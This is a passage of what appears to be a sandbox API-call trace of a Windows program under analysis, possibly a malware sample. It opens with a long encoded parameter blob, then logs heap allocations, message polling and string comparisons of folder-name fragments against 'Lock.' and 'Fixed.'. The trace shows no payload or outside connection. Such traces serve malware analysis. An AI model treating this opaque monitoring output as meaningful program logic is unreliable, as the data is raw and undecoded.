lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0223.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0223.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0223.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0223.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0223.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0223.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0223.621] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0223.621] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.621] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0223.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0223.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0223.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0223.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0223.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0223.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0223.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0223.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0223.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0223.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0223.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0223.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0223.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0223.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0223.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0223.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0223.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0223.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0223.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0223.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0223.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0223.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0223.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0223.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0223.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0223.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0223.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0223.622] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0223.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0223.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0223.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0223.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0223.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0223.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0223.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0223.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0223.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0223.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0223.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0223.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0223.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0223.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0223.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0223.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0223.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0223.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0223.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0223.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0223.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0223.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0223.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0223.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0223.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0223.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0223.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0223.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0223.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0223.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0223.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0223.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0223.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0223.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0223.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0223.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0223.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0223.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0223.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0223.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0223.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0223.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0223.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0223.624] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0223.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0223.624] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0223.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0223.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0223.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0223.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719f8 [0223.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0223.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0223.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0223.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0223.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0223.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0223.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0223.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0223.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0223.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0223.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0223.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0223.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0223.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x29f7878 [0223.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0223.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0223.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0223.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0223.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0223.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a38 [0223.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0223.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0223.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0223.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0223.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0223.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0223.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0223.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0223.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0223.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0223.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x2a683a8 [0223.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0223.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0223.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0223.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0223.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0223.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a68 [0223.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0223.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0223.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0223.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0223.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719d8 [0223.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0223.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0223.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0223.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab650 [0223.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0223.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0223.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0223.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0223.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0223.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0223.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0223.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0223.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0223.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0223.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0223.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0223.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0223.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0223.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0223.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0223.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0223.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0223.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0223.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0223.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0223.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0223.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0223.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0223.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0223.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0223.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0223.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0223.627] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0223.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0223.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0223.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0223.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0223.627] RtlAllocateHeap 